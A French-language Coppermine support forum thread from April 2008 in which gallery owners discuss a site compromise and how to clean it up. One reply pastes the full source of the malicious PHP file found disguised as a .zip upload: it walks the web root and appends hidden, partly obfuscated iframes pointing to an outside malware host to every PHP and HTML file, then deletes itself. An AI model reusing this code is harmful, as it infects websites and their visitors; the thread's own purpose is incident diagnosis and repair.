|
DavidG
Coppermine newbie
Posts: 5
|
 |
« Reply #20 on: April 08, 2008, 08:13:46 pm » |
|
en cherchant un peu sur le serveur, je viens de trouver dans le répertoire albums/userpics/10001 un fichier 142739_298w3.zip qui est en faite un fichier php voici le contenu : <?php
function fileExtension($file) {
$fileExp = explode('.', $file);
$filetype = $fileExp[count($fileExp)-1];
return $filetype;
}
function parse($path) {
$dir_array = array();
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
$try_dir = $path.$file.'/';
if(is_dir($try_dir)) {
array_push($dir_array, $try_dir);
}
else {
if ($path[strlen($path)-1] != '/') {
$path.= '/';
}
$f_ext = fileExtension($file);
if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
if($file!="debugger.inc.php") {
//chmod($path.$file,0777);
$fhandle = fopen($path.$file, 'a+');
if($f_ext=="php") {
fwrite($fhandle, "<?php echo '<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>'; ?>");
}
else {
fwrite($fhandle, "<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>");
}
fclose($fhandle);
}
}
}
}
}
closedir($handle);
}
return $dir_array;
}
function launch() {
$total = 0;
$last = 1;
$last_num = 0;
$path = $_SERVER['DOCUMENT_ROOT'];
$dirs = array();
array_push($dirs, $path);
while($last) {
$last_num = 0;
for( $j=$total; $j<$total+$last; $j++) {
$temp_dirs = parse($dirs[$j]);
$last_t = sizeof($temp_dirs);
$last_num += $last_t;
for( $i=0; $i<$last_t; $i++) {
array_push($dirs, $temp_dirs[$i]);
}
}
$total += $last;
$last = $last_num;
}
$paths = $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];
unlink($paths);
if (is_file($paths)) {
$fhandle = fopen($paths, 'w');
fwrite($fhandle, "<?php echo'Upload plugins here'; ?>");
fclose($fhandle);
}
}
if (isset($_GET['ff']))
{
echo "~!";
launch();
}
echo '<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>';
?> |
|
|
|
|
Logged
|
|
|
|
Pascal YAP
Moderator
Gender: 
 Armenia
Posts: 3791
He's me, and She's Moon
|
|
« Reply #21 on: April 08, 2008, 08:40:34 pm » |
|
Bonjour,
Là on est tous d'accord, il y a un gros soucis de sécu !
La solution ultime consiste, hélas, à replacer des fichiers propres (Clean) !
N'oubliez pas de remplacer également vos fichiers de plugins, si vous en avez installé !
Il n'y a pas de solution logiciel actuellement....
Wait'n See ( attendre et voir)
PYAP
|
|
|
|
« Last Edit: April 09, 2008, 04:10:02 pm by Pascal YAP »
|
Logged
|
! Pas de PM please ! No PM s'il vous plait !
|
|
|
mafieuso 
Coppermine regular visitor
Posts: 85
|
|
« Reply #22 on: April 08, 2008, 08:49:13 pm » |
|
Ah oui j'avais oublié de signaler que j'avais aussi ce fichier zip, je l'ai supprimé sans regarder ce qu'il y avait dedans par peur d'une infection...
|
|
|
|
|
Logged
|
|
|
|
Coline
Coppermine regular visitor
Posts: 55
|
 |
« Reply #23 on: April 08, 2008, 08:51:29 pm » |
|
Et en le supprimant tu n'as eu aucun problème?
Je voulais savoir comment je fais pour tout remettre à jour en ayant un modded?
Je remet la mise à jour cpg1.4.16 puis le modded?
merci
|
|
|
|
|
Logged
|
|
|
|
mafieuso
Coppermine regular visitor
Posts: 85
|
|
« Reply #24 on: April 08, 2008, 10:07:29 pm » |
|
Comme l'a dit Pascal YAP un peu plus haut il faut que tu remplaces les fichiers qui sont sur le FTP, tous les dossiers mis à part le dossier albums.
Si tu as une copie de tous ces fichiers sur ton pc avant l'attaque ça devrait être assez simple sinon il faut que tu télécharges la version que tu as sur le serveur et modifie les fichiers avant de tout retransférer.
|
|
|
|
|
Logged
|
|
|
|
Coline
Coppermine regular visitor
Posts: 55
|
|
« Reply #25 on: April 08, 2008, 10:25:05 pm » |
|
J'ai remis la mise à jours cpg1.4.16.zip + le stramm_mod1_4_16_bridge.zip et j'ai toujours ce virus  |
|
|
|
|
Logged
|
|
|
|
becassier.29
Coppermine novice
Gender:
Posts: 33
|
|
« Reply #26 on: April 08, 2008, 10:49:27 pm » |
|
Bon ben apparement la buse c'est faite aussi attaquée. L'accès à ma galerie bugg, la mise en page est dans les choux, des albums semblent avoir disparus, mais peut être pas les photos. Un membre m'avait signalé la présence d'un virus (dont je me rappelle plus le nom) à l'ouverture de la galerie. Cette après midi j'avais pu y aller, mais ce soir c'est dur dur. Pas moyen de m'identifier, ça bugg avant. Très grosse galère pour moi à la mise en place de cette galerie, voilà que maintenant ça merdouille.....................   |
|
|
|
|
Logged
|
|
|
|
sanlogik
Coppermine frequent poster
Gender:
 France
Posts: 209
Ah que la vie est belle, quelquefois pour un rien
|
|
« Reply #27 on: April 08, 2008, 11:10:47 pm » |
|
vous me faites peur avé vos histoires là...
du coup sauvegarde "express" (façon de parler) des fichiers du serveur, lol
|
|
|
|
|
Logged
|
C'est pas parce qu'on est différent qu'on est plus intelligent. Soundamental : le forum | la galerie |
|
|
becassier.29
Coppermine novice
Gender:
Posts: 33
|
|
« Reply #28 on: April 08, 2008, 11:50:27 pm » |
|
Pour mon cas j'a itélécharger récement une nouvelle version de Java Sun, Comme apparement Coppermine tourne avec ça le problème ne viendrait il pas de là?
|
|
|
|
|
Logged
|
|
|
|
|
|
|
DavidG
Coppermine newbie
Posts: 5
|
|
« Reply #30 on: April 09, 2008, 07:18:18 am » |
|
Merci pour l'info mr.goose.
|
|
|
|
|
Logged
|
|
|
|
Feerie21
Coppermine newbie
Gender: 
Posts: 10
|
|
« Reply #31 on: April 09, 2008, 09:51:38 am » |
|
Pour ma part tout semble être régler, jai remplacer tous les fichier par des fichier "propres". Supprimer le "fichier zip" qui avait été uploader et qui semplait être une des cause de ce big bug, activer l'inscription des utilisateur avant acces a la galerie. Et tout marche correctement pour le moment. Je croise les doigts pour que ca continue. Merci pour tous vos conseils en tout cas  |
|
|
|
|
Logged
|
|
|
|
Coline
Coppermine regular visitor
Posts: 55
|
|
« Reply #32 on: April 09, 2008, 10:42:45 am » |
|
J'ai également tous enlevé (sauf album) et tous remis et le virus c'est envolé ouf! je suis soulagée
|
|
|
|
|
Logged
|
|
|
|
Feerie21
Coppermine newbie
Gender:
Posts: 10
|
|
« Reply #33 on: April 09, 2008, 01:14:23 pm » |
|
J'ai parler trop vite, maitenant il met impossible d'uploader un fichier que ce soit manuellement ou en passant par FTP.  |
|
|
|
|
Logged
|
|
|
|
becassier.29
Coppermine novice
Gender:
Posts: 33
|
|
« Reply #34 on: April 09, 2008, 01:35:14 pm » |
|
Des virus semblent être dans le update de la nouvelle version de java. Mon antivirus m'en sort a chaque voit que je tente de me connecter a ma galerie.
|
|
|
|
|
Logged
|
|
|
|
mafieuso
Coppermine regular visitor
Posts: 85
|
|
« Reply #35 on: April 09, 2008, 02:49:36 pm » |
|
J'ai également tous enlevé (sauf album) et tous remis et le virus c'est envolé ouf! je suis soulagée
Juste un petit détail dans chaque dossier d'images donc sous-dossiers de albums il y a normalement un fichier index.html qui est vide (juste pour éviter que quelqu'un se ballade dans le répertoire) or après l'attaque il y a dedans cette fameuse ligne de code bizarre, donc il si tu veux que ce soit complètement propre il te faut remplacer le index.html modifié par un fichier index.html vide (un simple fichier txt renommé fera l'affaire) dans chaque sous-dossier, c'est un peu long car il faut le faire manuellement mais bon ça vaut le coup à mon avis ! |
|
|
|
|
Logged
|
|
|
|
|
dorifort
Coppermine newbie
Posts: 11
|
|
« Reply #36 on: April 09, 2008, 03:31:38 pm » |
|
bonjour à tous, jai subit le même sort sur l'une de mes galerie  bon je dois dire quant même que cette attaque et ce problème n'est pas du cas coppermine mais à tout un tas de galerie ou CMS utilisant du code, ce sont tous les fichier index.php qui sont touché, donc le seul reméde à faire c'est de remplacer tous les fichiers index.php de votre CMS ou de votre galerie photo et vérifier le dossier /albums/userpics/ dedans l'on trouve un dossier par exemple ici /10001/ il correspont au upload effectué pour la galerie à l'intérieur de celui il y à peut être un zip virer le  voila ) un bon conseil aussi heureusement que j'avais installé le plugins de sauvegarde, une fois votre nettoyage fait tout reviens d'en l odre comment sa viens la dedans ou comment il peuvent changer les fichier index.php de nos galerie ou CMS j'en sais rien du tout  bonne fin de journéé à tous |
|
|
|
|
Logged
|
|
|
|
Pascal YAP
Moderator
Gender:
Armenia
Posts: 3791
He's me, and She's Moon
|
|
« Reply #37 on: April 09, 2008, 04:14:07 pm » |
|
ce sont tous les fichier index.php qui sont touché Exact ! Mais pour être plus précis encore, se sont hélas TOUS les fichiers qui sont modifiés ! Idem pour les HTML du site. Idem pour les Plugin de Coppermine... Même le fichier CONFIG.INC.PHP est touché Qui est rappelons-le le cœur de Coppermine ! Il faut remplacer tous les fichiers de vos sites. C'est l'occasion pour faire une mise à jour 1.4.16 actuellement. Mr.Goose signale ce Sujet en anglais ( http://forum.coppermine-gallery.net/index.php/topic,51671.0.html) dans lequel il signale la présence suspect d'un fichier ZIP nommé comme ceci : 142739_298w3.zipPerso n'ai pas trouvé ce fichier sur mon serveur ! PYAP |
|
|
|
« Last Edit: April 09, 2008, 04:20:01 pm by Pascal YAP »
|
Logged
|
! Pas de PM please ! No PM s'il vous plait !
|
|
|
|
dorifort
Coppermine newbie
Posts: 11
|
|
« Reply #38 on: April 09, 2008, 04:19:27 pm » |
|
oui c'est bizarre, je viens aussi de poser la question sur le forum de guppy pour ce CMS on me dis faut le mettre à jour et que la faille étais connue, euh sauf que mon guppy était à jour au dernier crie, donc tu voi y à bien pour moi aussi des CMS qui sont touché pour la galerie directement je me suis rendu ici pour voir si vous en parliez un peu encore des clowns qui non rien d'autre à faire que d'emmerder des gens qui vienne partager ici ou la l'une de leur petite passion grace à nos galerie cordialement, alain |
|
|
|
|
Logged
|
|
|
|
Pascal YAP
Moderator
Gender:
Armenia
Posts: 3791
He's me, and She's Moon
|
|
« Reply #39 on: April 09, 2008, 04:31:37 pm » |
|
Une vulnérabilité dans le fichier UPLOAD.PHP a été déceller.
Le fix est en TEST actuellement.
Mais déjà, il est possible de ne pas proposer la fonction URL/URI dans votre Galerie.
PYAP
|
|
|
|
|
Logged
|
! Pas de PM please ! No PM s'il vous plait !
|
|
|
|
